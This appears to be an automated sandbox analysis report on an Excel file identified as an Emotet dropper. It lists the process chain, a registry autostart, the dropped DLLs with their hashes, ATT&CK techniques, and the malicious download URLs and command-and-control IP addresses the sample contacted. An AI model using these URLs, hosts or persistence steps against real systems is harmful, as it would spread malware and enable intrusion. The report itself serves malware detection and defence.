                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 2.8 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_00000001800132FC FindNextFileW,FindFirstFileW,FindClose,
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: regsvr32.exe, 00000008.00000002.941889396.00000000000FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100342D0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10014064 GetModuleHandleA,LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10031FC0 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_100342D0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10034370 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10034490 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10040590 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10039C90 SetUnhandledExceptionFilter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10039CC0 SetUnhandledExceptionFilter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1002FF40 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 218.38.121.17 443
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetModuleHandleA,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetProcAddress,ConvertDefaultLocale,ConvertDefaultLocale,GetVersion,RegOpenKeyExA,RegQueryValueExA,ConvertDefaultLocale,ConvertDefaultLocale,RegCloseKey,GetModuleHandleA,EnumResourceLanguagesA,ConvertDefaultLocale,ConvertDefaultLocale,GetModuleFileNameA,GetLocaleInfoA,LoadLibraryA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetUserDefaultLCID,EnumSystemLocalesA,GetUserDefaultLCID,GetLocaleInfoA,GetLocaleInfoA,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_1003F040 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_10031FC0 GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,FlsSetValue,GetCurrentThreadId,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 0000000A.00000002.1211606431.000000000017A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1211620382.000000000021A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000009.00000002.1211814809.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1213054445.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.942096747.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.943086830.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1212856230.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1211836015.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Scripting                      		11
                      Registry Run Keys / Startup Folder                      		111
                      Process Injection                      		141
                      Masquerading                      		1
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services1
                      Input Capture                      		Exfiltration Over Other Network Medium21
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Native API                      		Boot or Logon Initialization Scripts11
                      Registry Run Keys / Startup Folder                      		1
                      Virtualization/Sandbox Evasion                      		LSASS Memory121
                      Security Software Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		Exfiltration Over Bluetooth14
                      Ingress Tool Transfer                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts43
                      Exploitation for Client Execution                      		Logon Script (Windows)Logon Script (Windows)111
                      Process Injection                      		Security Account Manager1
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
                      Scripting                      		NTDS2
                      Process Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer124
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Obfuscated Files or Information                      		Cached Domain Credentials2
                      File and Directory Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32                      		DCSync26
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 746417 Sample: 4470_02112022.xls Startdate: 15/11/2022 Architecture: WINDOWS Score: 100 37 103.224.241.74 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 2->37 39 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->39 41 43 other IPs or domains 2->41 53 Snort IDS alert for network traffic 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Antivirus detection for URL or domain 2->57 59 12 other signatures 2->59 8 EXCEL.EXE 7 25 2->8         started        13 regsvr32.exe 2->13         started        signatures3 process4 dnsIp5 43 www.spinbalence.com 8->43 45 sat7ate.com 8->45 47 4 other IPs or domains 8->47 29 C:\Users\user\oxnv4.ooccxx, PE32+ 8->29 dropped 31 C:\Users\user\AppData\...\40hd04O0[1].dll, PE32+ 8->31 dropped 33 C:\Users\user\Desktop\4470_02112022.xls, Composite 8->33 dropped 61 Document exploit detected (creates forbidden files) 8->61 63 Document exploit detected (UrlDownloadToFile) 8->63 15 regsvr32.exe 2 8->15         started        19 regsvr32.exe 8->19         started        21 regsvr32.exe 8->21         started        23 regsvr32.exe 8->23         started        65 System process connects to network (likely due to code injection or exploit) 13->65 file6 67 Outdated Microsoft Office dropper detected 43->67 signatures7 process8 file9 35 C:\Windows\System32\XXKTOC\CASBb.dll (copy), PE32+ 15->35 dropped 51 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->51 25 regsvr32.exe 1 15->25         started        signatures10 process11 dnsIp12 49 218.38.121.17, 443, 49180, 49181 SKB-ASSKBroadbandCoLtdKR Korea Republic of 25->49 69 Creates an autostart registry key pointing to binary in C:\Windows 25->69 signatures13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      4470_02112022.xls81%ReversingLabsDocument-Office.Trojan.Emotet
                      4470_02112022.xls68%VirustotalBrowse
                      4470_02112022.xls32%MetadefenderBrowse
                      4470_02112022.xls100%AviraXF/Agent.B2

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll81%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll20%MetadefenderBrowse
                      C:\Users\user\oxnv4.ooccxx81%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\oxnv4.ooccxx20%MetadefenderBrowse
                      C:\Windows\System32\XXKTOC\CASBb.dll (copy)81%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\XXKTOC\CASBb.dll (copy)20%MetadefenderBrowse

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      10.2.regsvr32.exe.2b0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      9.2.regsvr32.exe.2c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      8.2.regsvr32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1215461Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      www.3d-stickers.com12%VirustotalBrowse
                      www.spinbalence.com12%VirustotalBrowse
                      navylin.com13%VirustotalBrowse
                      sat7ate.com14%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      https://218.38.121.17/0%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://navylin.com/bsavxiv/axHQYKl/22%VirustotalBrowse
                      https://www.3d-stickers.com/page-non-trouvee12%VirustotalBrowse
                      https://www.spinbalence.com/index.php?controller=40410%VirustotalBrowse
                      https://www.3d-stickers.com/Content/Afa1PcRuxh/0%Avira URL Cloudsafe
                      https://www.spinbalence.com/Adapter/moycMR/100%Avira URL Cloudmalware
                      https://www.spinbalence.com/index.php?controller=404100%Avira URL Cloudmalware
                      http://navylin.com/bsavxiv/axHQYKl/100%Avira URL Cloudmalware
                      https://www.3d-stickers.com/page-non-trouvee100%Avira URL Cloudmalware
                      http://www.spinbalence.com/Adapter/moycMR/100%Avira URL Cloudmalware
                      http://www.3d-stickers.com/Content/Afa1PcRuxh/100%Avira URL Cloudmalware
                      https://secure.comodo.coh0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.3d-stickers.com
                      		163.172.108.69
                      		truefalseunknown
                      www.spinbalence.com
                      		163.172.115.127
                      		truefalseunknown
                      navylin.com
                      		47.92.133.65
                      		truefalseunknown
                      sat7ate.com
                      		unknown
                      		unknowntrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://www.3d-stickers.com/Content/Afa1PcRuxh/true
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.spinbalence.com/Adapter/moycMR/false
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.spinbalence.com/index.php?controller=404false
                      • 10%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      https://218.38.121.17/true
                      • URL Reputation: safe
                      		unknown
                      http://navylin.com/bsavxiv/axHQYKl/false
                      • 22%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.3d-stickers.com/page-non-trouveetrue
                      • 12%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.spinbalence.com/Adapter/moycMR/false
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.3d-stickers.com/Content/Afa1PcRuxh/true
                      • Avira URL Cloud: malware
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://crl.entrust.net/server1.crl0regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://ocsp.entrust.net03regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://secure.comodo.cohregsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net0Dregsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://secure.comodo.com/CPS0regsvr32.exe, 00000009.00000002.1211805437.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155093375.00000000002B9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000009.00000003.1154926566.0000000000268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.1155033537.000000000026A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1211759132.000000000026F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1211733355.00000000001BC000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            188.165.79.151
                            		unknownFrance
                            		16276OVHFRtrue
                            196.44.98.190
                            		unknownGhana
                            		327814EcobandGHtrue
                            174.138.33.49
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue
                            36.67.23.59
                            		unknownIndonesia
                            		17974TELKOMNET-AS2-APPTTelekomunikasiIndonesiaIDtrue
                            103.41.204.169
                            		unknownIndonesia
                            		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                            85.214.67.203
                            		unknownGermany
                            		6724STRATOSTRATOAGDEtrue
                            83.229.80.93
                            		unknownUnited Kingdom
                            		8513SKYVISIONGBtrue
                            198.199.70.22
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue
                            93.104.209.107
                            		unknownGermany
                            		8767MNET-ASGermanyDEtrue
                            186.250.48.5
                            		unknownBrazil
                            		262807RedfoxTelecomunicacoesLtdaBRtrue
                            175.126.176.79
                            		unknownKorea Republic of
                            		9523MOKWON-AS-KRMokwonUniversityKRtrue
                            128.199.242.164
                            		unknownUnited Kingdom
                            		14061DIGITALOCEAN-ASNUStrue
                            178.238.225.252
                            		unknownGermany
                            		51167CONTABODEtrue
                            163.172.115.127
                            		www.spinbalence.comUnited Kingdom
                            		12876OnlineSASFRfalse
                            190.145.8.4
                            		unknownColombia
                            		14080TelmexColombiaSACOtrue
                            46.101.98.60
                            		unknownNetherlands
                            		14061DIGITALOCEAN-ASNUStrue
                            82.98.180.154
                            		unknownSpain
                            		42612DINAHOSTING-ASEStrue
                            103.71.99.57
                            		unknownIndia
                            		135682AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdINtrue
                            87.106.97.83
                            		unknownGermany
                            		8560ONEANDONE-ASBrauerstrasse48DEtrue
                            103.254.12.236
                            		unknownViet Nam
                            		56151DIGISTAR-VNDigiStarCompanyLimitedVNtrue
                            103.85.95.4
                            		unknownIndonesia
                            		136077IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramIDtrue
                            202.134.4.210
                            		unknownIndonesia
                            		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                            165.22.254.236
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue
                            78.47.204.80
                            		unknownGermany
                            		24940HETZNER-ASDEtrue
                            118.98.72.86
                            		unknownIndonesia
                            		7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                            139.59.80.108
                            		unknownSingapore
                            		14061DIGITALOCEAN-ASNUStrue
                            104.244.79.94
                            		unknownUnited States
                            		53667PONYNETUStrue
                            37.44.244.177
                            		unknownGermany
                            		47583AS-HOSTINGERLTtrue
                            51.75.33.122
                            		unknownFrance
                            		16276OVHFRtrue
                            47.92.133.65
                            		navylin.comChina
                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                            160.16.143.191
                            		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                            103.56.149.105
                            		unknownIndonesia
                            		55688BEON-AS-IDPTBeonIntermediaIDtrue
                            85.25.120.45
                            		unknownGermany
                            		8972GD-EMEA-DC-SXB1DEtrue
                            139.196.72.155
                            		unknownChina
                            		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                            103.126.216.86
                            		unknownBangladesh
                            		138482SKYVIEW-AS-APSKYVIEWONLINELTDBDtrue
                            128.199.217.206
                            		unknownUnited Kingdom
                            		14061DIGITALOCEAN-ASNUStrue
                            114.79.130.68
                            		unknownIndia
                            		45769DVOIS-IND-VoisBroadbandPvtLtdINtrue
                            103.224.241.74
                            		unknownIndia
                            		133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue
                            210.57.209.142
                            		unknownIndonesia
                            		38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                            202.28.34.99
                            		unknownThailand
                            		9562MSU-TH-APMahasarakhamUniversityTHtrue
                            80.211.107.116
                            		unknownItaly
                            		31034ARUBA-ASNITtrue
                            54.37.228.122
                            		unknownFrance
                            		16276OVHFRtrue
                            163.172.108.69
                            		www.3d-stickers.comUnited Kingdom
                            		12876OnlineSASFRfalse
                            218.38.121.17
                            		unknownKorea Republic of
                            		9318SKB-ASSKBroadbandCoLtdKRtrue
                            185.148.169.10
                            		unknownGermany
                            		44780EVERSCALE-ASDEtrue
                            195.77.239.39
                            		unknownSpain
                            		60493FICOSA-ASEStrue
                            178.62.112.199
                            		unknownEuropean Union
                            		14061DIGITALOCEAN-ASNUStrue
                            62.171.178.147
                            		unknownUnited Kingdom
                            		51167CONTABODEtrue
                            64.227.55.231
                            		unknownUnited States
                            		14061DIGITALOCEAN-ASNUStrue

                            Private

                            IP
                            192.168.2.255

                            General Information

                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:746417
                            Start date and time:2022-11-15 12:42:46 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 8m 23s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:4470_02112022.xls
                            Cookbook file name:defaultwindowsofficecookbook.jbs
                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                            Number of analysed new started processes analysed:12
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.expl.evad.winXLS@12/10@4/50
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 79.5% (good quality ratio 69.4%)
                            • Quality average: 70.7%
                            • Quality standard deviation: 34%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .xls
                            • Found Word or Excel or PowerPoint or XPS Viewer
                            • Found warning dialog
                            • Click Ok
                            • Found warning dialog
                            • Click Ok
                            • Found warning dialog
                            • Click Ok
                            • Attach to Office via COM
                            • Scroll down
                            • Close Viewer

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                            • TCP Packets have been reduced to 100
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            12:43:36API Interceptor5x Sleep call for process: regsvr32.exe modified
                            12:44:20AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run CASBb.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XXKTOC\CASBb.dll"

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASNs

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\40hd04O0[1].dll

                            Download File
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):769024
                            Entropy (8bit):6.637885736387009
                            Encrypted:false
                            SSDEEP:12288:8iW4+vsmQhWi6zQCXbPlLyqOMSRZuH/sAvvszVIf:8iWHhECXbPlLyqOMUMJvszVIf
                            MD5:22CE6200C1714603F94B11F6DF41140F
                            SHA1:F6A7B8550BE698D1BFC34219F245FEF7E7F59147
                            SHA-256:FB9AB8EFA3269F359F9010AECC543E992705E900CC11B02DBDFB1C6572A5500A
                            SHA-512:1F4421914A0172DAFE748711B0851DD2F977337DC7F9D170CAB0549C1906B110706FC302AD6652305B7335237551BE7CC4350AD0ABFB89315355F8BC8519B024
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 81%
                            • Antivirus: Metadefender, Detection: 20%, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%..K..K..K.%&..K..~6..K..~&.C.K.%0...K..J...K..~%.v.K..~1..K..~3..K.Rich.K.................PE..d.....dc.........." .....Z...^......`#.......................................`.......V..............................................0...O...P...................|e........... .......................................................p..........@....................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...p........:..................@....pdata..|e.......f..."..............@..@.rsrc...............................@..@.reloc..l0... ...2..................@..B........................................................................................................................................................................................................................................................................

